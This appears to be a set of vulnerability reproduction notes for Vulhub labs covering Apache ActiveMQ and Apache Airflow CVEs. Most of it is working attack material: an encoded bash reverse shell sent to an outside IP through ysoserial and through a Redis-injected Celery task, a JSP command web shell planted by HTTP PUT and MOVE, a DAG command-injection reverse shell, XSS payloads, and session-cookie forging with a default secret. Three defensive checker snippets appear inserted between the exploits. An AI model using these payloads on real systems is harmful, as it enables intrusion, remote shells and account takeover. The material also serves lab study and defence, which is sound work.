Vulhub reproduction notes

A

activemq

ActiveMQ deserialization vulnerability (CVE-2015-5254)

Apache ActiveMQ 5.x before 5.13.0 has a security vulnerability: the broker does not restrict which classes may be deserialized. A remote attacker can exploit it to execute arbitrary code by way of a specially crafted serialized Java Message Service (JMS) ObjectMessage object.

Accessing the message through the web admin page to trigger the vulnerability requires administrator privileges.

Generate the payload with the ysoserial bundled in jmet-0.1.0-all.jar to obtain a shell (the command needs to be encoded):

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80My4xMzkuMTU0LjIxOS8xMjM0NSAwPiYx}|{base64,-d}|{bash,-i}" -Yp ROME 43.139.154.219 61616

ActiveMQ arbitrary file write vulnerability (CVE-2016-3088), affects ActiveMQ 5.0.0 - 5.13.2

In ActiveMQ 5.12.x to 5.13.x the fileserver application is disabled by default (it can be enabled in conf/jetty.xml); from 5.14.0 onward the fileserver application was removed entirely.

PUT /fileserver/1.txt HTTP/1.1
Host: 43.139.154.219:8161
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 327

<%@ page import="java.io.*"%>
<%
out.print("Hello</br>");
String strcmd=request.getParameter("cmd");
String line=null;
Process p=Runtime.getRuntime().exec(strcmd);
BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
while((line=br.readLine())!=null){
out.print(line+"</br>");
}
%>
MOVE /fileserver/1.txt HTTP/1.1
Destination:file:///opt/activemq/webapps/api/5.jsp
Host: 43.139.154.219:8161
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 0

Other ActiveMQ vulnerabilities

https://github.com/justbaibai/Armory/tree/main/a/ActiveMQ

Weak password

admin/admin

Unauthenticated access

/admin/connections.jsp
/api

Information disclosure

http://www.example.com:8161//admin/index.jsp
http://www.example.com:8161//admin/queues.jsp
http://www.example.com:8161//admin/topics.jsp
Returns the application name, JVM, operating system and kernel version:
telnet ip:61616

Affected versions:
apache-activemq-5.15.0 to apache-activemq-5.15.2
apache-activemq-5.14.0 to apache-activemq-5.14.5
PUT /fileserver/a../%08     (works on older versions)

XSS vulnerabilities

/admin/queueBrowse/example.A?view=rss&feedType=<script>alert("ACTIVEMQ")</script> 
/createDestination.action?JMSDestination=[XSS_PAYLOAD]
/admin/queues.jsp?QueueFilter=yu1ey%22%3e%3cscript%3ealert(%22SpiderLabs%22)%3c%2fscript%3eqb68

airflow

Command injection in an Apache Airflow example DAG (CVE-2020-11978)

An unauthenticated visitor can use this vulnerability to execute arbitrary commands on the Worker.

Open the Airflow admin UI and switch example_trigger_target_dag from Off to On:


Then, in Trigger DAG: example_trigger_target_dag, submit the command:


{"message":"\";bash -i >& /dev/tcp/43.139.154.219/1234 0>&1;#"}

Principle: example_trigger_target_dag has schedule: None, so dag_run is invoked directly, and the command is built by string concatenation.

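Added illustration, not Airflow's own code: the assumed shape of the example DAG's bash template next to a hardened form that hands the message to the shell only as an environment variable, plus a check that tells whether a rendered command string contains more than the single intended command. The injected sample is constructed and benign.

```python
import shlex

# Assumed shape of the example DAG's BashOperator template (illustration, not Airflow's own code):
# dag_run.conf["message"] is spliced straight into the shell string that the worker executes.
VULNERABLE_TEMPLATE = 'echo "Here is the message: \'{message}\'"'
# Hardened variant: a constant shell string; the untrusted value only reaches bash as an env var.
HARDENED_COMMAND = 'echo "Here is the message: $message"'
SEPARATORS = {";", "&&", "||", "|", "&"}

def render_vulnerable(conf):
    """String concatenation: whatever is in conf["message"] becomes shell syntax."""
    return VULNERABLE_TEMPLATE.format(message=conf.get("message", ""))

def render_hardened(conf):
    """The command never changes; the value travels out-of-band in the environment."""
    return HARDENED_COMMAND, {"message": conf.get("message", "")}

def injects_extra_command(shell_string):
    """True if a POSIX shell would see more than one command (or cannot even parse the string)."""
    lexer = shlex.shlex(shell_string, posix=True, punctuation_chars=";&|")
    try:
        return any(tok in SEPARATORS for tok in lexer)
    except ValueError:          # unbalanced quotes left behind by a payload that broke out
        return True

# Constructed inputs: a benign message and one in the same shape as the payload shown above.
BENIGN = {"message": "hello"}
INJECTED = {"message": '";id;#'}
```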

Apache Airflow Celery message broker command execution (CVE-2020-11981)

import pickle
import json
import base64
import redis
import sys
r = redis.Redis(host=sys.argv[1], port=6379, decode_responses=True,db=0)
queue_name = 'default'
ori_str="{\"content-encoding\": \"utf-8\", \"properties\": {\"priority\": 0, \"delivery_tag\": \"f29d2b4f-b9d6-4b9a-9ec3-029f9b46e066\", \"delivery_mode\": 2, \"body_encoding\": \"base64\", \"correlation_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"delivery_info\": {\"routing_key\": \"celery\", \"exchange\": \"\"}, \"reply_to\": \"fb996eec-3033-3c10-9ee1-418e1ca06db8\"}, \"content-type\": \"application/json\", \"headers\": {\"retries\": 0, \"lang\": \"py\", \"argsrepr\": \"(100, 200)\", \"expires\": null, \"task\": \"airflow.executors.celery_executor.execute_command\", \"kwargsrepr\": \"{}\", \"root_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"parent_id\": null, \"id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"origin\": \"gen1@132f65270cde\", \"eta\": null, \"group\": null, \"timelimit\": [null, null]}, \"body\": \"W1sxMDAsIDIwMF0sIHt9LCB7ImNoYWluIjogbnVsbCwgImNob3JkIjogbnVsbCwgImVycmJhY2tzIjogbnVsbCwgImNhbGxiYWNrcyI6IG51bGx9XQ==\"}"
task_dict = json.loads(ori_str)
#command = ['touch', '/tmp/airflow_celery_success']
command = ['bash','-c','{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80My4xMzkuMTU0LjIxOS8xMjM0NSAwPiYx}|{base64,-d}|{bash,-i}']
body=[[command], {}, {"chain": None, "chord": None, "errbacks": None, "callbacks": None}]
print(body)
task_dict['body']=base64.b64encode(json.dumps(body).encode()).decode()
print(task_dict)
r.lpush(queue_name,json.dumps(task_dict))
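As an added example that is not part of these notes or of Airflow's code: a defender-side check that walks Celery envelopes of the shape the script above pushes into Redis, decodes the base64 body and flags any execute_command whose argv is not a list of strings beginning with the assumed legitimate prefix ("airflow", "run"). The sample queue is constructed inline and includes the body string from the script above.

```python
import base64
import json

TASK = "airflow.executors.celery_executor.execute_command"
EXPECTED_PREFIX = ("airflow", "run")   # assumption: how legitimate executor commands begin

def make_envelope(body_b64):
    # Constructed Kombu envelope with only the fields the check reads (same shape as the script above).
    return json.dumps({"content-type": "application/json",
                       "properties": {"body_encoding": "base64"},
                       "headers": {"task": TASK, "id": "ed5f75c1-94f7-43e4-ac96-e196ca248bd4"},
                       "body": body_b64})

def encode_body(command):
    body = [[command], {}, {"chain": None, "chord": None, "errbacks": None, "callbacks": None}]
    return base64.b64encode(json.dumps(body).encode()).decode()

# Constructed sample queue: one benign task, one shell command, and the body from the original script.
SAMPLE_QUEUE = [
    make_envelope(encode_body(["airflow", "run", "example_bash_operator", "runme_0", "2023-07-26"])),
    make_envelope(encode_body(["bash", "-c", "id"])),
    make_envelope("W1sxMDAsIDIwMF0sIHt9LCB7ImNoYWluIjogbnVsbCwgImNob3JkIjogbnVsbCwgImVycmJhY2tzIjogbnVsbCwgImNhbGxiYWNrcyI6IG51bGx9XQ=="),
]

def decode_command(raw_message):
    """Return the argv execute_command would run, or None if the envelope carries some other task."""
    env = json.loads(raw_message)
    if env.get("headers", {}).get("task") != TASK:
        return None
    if env.get("properties", {}).get("body_encoding") != "base64":
        return None
    args, _kwargs, _embed = json.loads(base64.b64decode(env["body"]))
    return args[0] if args else []      # first positional argument is the command list

def is_suspicious(command):
    """Anything that is not a list of strings starting with the expected prefix gets flagged."""
    if not isinstance(command, list) or not all(isinstance(a, str) for a in command):
        return True
    return tuple(command[:2]) != EXPECTED_PREFIX

def audit_queue(messages):
    return [cmd for cmd in map(decode_command, messages) if cmd is not None and is_suspicious(cmd)]
```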

Apache Airflow default secret key authorization bypass (CVE-2020-17526)

pip3 install flask-unsign
pip3 install flask-unsign[wordlist]
curl -v http://localhost:8080/admin/airflow/login
* Trying 127.0.0.1:8080...
* Connected to localhost (127.0.0.1) port 8080 (#0)
> GET /admin/airflow/login HTTP/1.1
> Host: localhost:8080
> User-Agent: curl/7.88.1
> Accept: */*
>
< HTTP/1.1 200 OK
< Server: gunicorn/19.10.0
< Date: Wed, 26 Jul 2023 07:44:11 GMT
< Connection: close
< Content-Type: text/html; charset=utf-8
< Content-Length: 7750
< Vary: Cookie
< Set-Cookie: session=eyJjc3JmX3Rva2VuIjoiN2QyYmViNjhhMjNkNjk4ZDdlZjJmM2M1M2ZhYThmZjU4MjNjNGM0MSJ9.ZMDOyw.2giwxxnjtgQEvMgUlvvCozp0hsg; HttpOnly; Path=/
flask-unsign -u -c eyJjc3JmX3Rva2VuIjoiN2QyYmViNjhhMjNkNjk4ZDdlZjJmM2M1M2ZhYThmZjU4MjNjNGM0MSJ9.ZMDOyw.2giwxxnjtgQEvMgUlvvCozp0hsg
flask-unsign -s --secret temporary_key -c "{'user_id': '1', '_fresh': False, '_permanent': True}"
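Added example, not part of these notes or of flask-unsign: an audit check that recomputes Flask's session signature (itsdangerous with salt cookie-session, HMAC-SHA1 and HMAC key derivation, the scheme Flask's session interface uses) and reports whether a cookie still verifies under the default secret temporary_key. It uses the Set-Cookie value captured above; point it at a cookie from your own Airflow instance to confirm the secret has been changed.

```python
import base64
import hashlib
import hmac
import json
import zlib

# Session cookie from the Set-Cookie header above; "temporary_key" is Airflow 1.10's default secret.
PAGE_COOKIE = ("eyJjc3JmX3Rva2VuIjoiN2QyYmViNjhhMjNkNjk4ZDdlZjJmM2M1M2ZhYThmZjU4MjNjNGM0MSJ9"
               ".ZMDOyw.2giwxxnjtgQEvMgUlvvCozp0hsg")
DEFAULT_SECRETS = ("temporary_key",)   # extend with other shipped defaults you audit against

def _b64d(s):
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def _b64e(b):
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()

def flask_signature(signed_value, secret, salt=b"cookie-session"):
    """Signature Flask's session interface puts on 'payload.timestamp':
    HMAC-SHA1 keyed with HMAC-SHA1(secret, salt) (itsdangerous key_derivation='hmac')."""
    derived_key = hmac.new(secret.encode(), salt, hashlib.sha1).digest()
    return _b64e(hmac.new(derived_key, signed_value.encode(), hashlib.sha1).digest())

def session_payload(cookie):
    """Decode the session contents without verifying; a leading '.' marks a zlib-compressed payload."""
    payload = cookie.rsplit(".", 2)[0]
    if payload.startswith("."):
        return json.loads(zlib.decompress(_b64d(payload[1:])))
    return json.loads(_b64d(payload))

def verifies_with(cookie, secret):
    payload, timestamp, signature = cookie.rsplit(".", 2)
    return hmac.compare_digest(flask_signature(payload + "." + timestamp, secret), signature)

def find_default_secret(cookie, candidates=DEFAULT_SECRETS):
    """Return the default secret this cookie verifies under, or None if the deployment uses its own key."""
    for secret in candidates:
        if verifies_with(cookie, secret):
            return secret
    return None
```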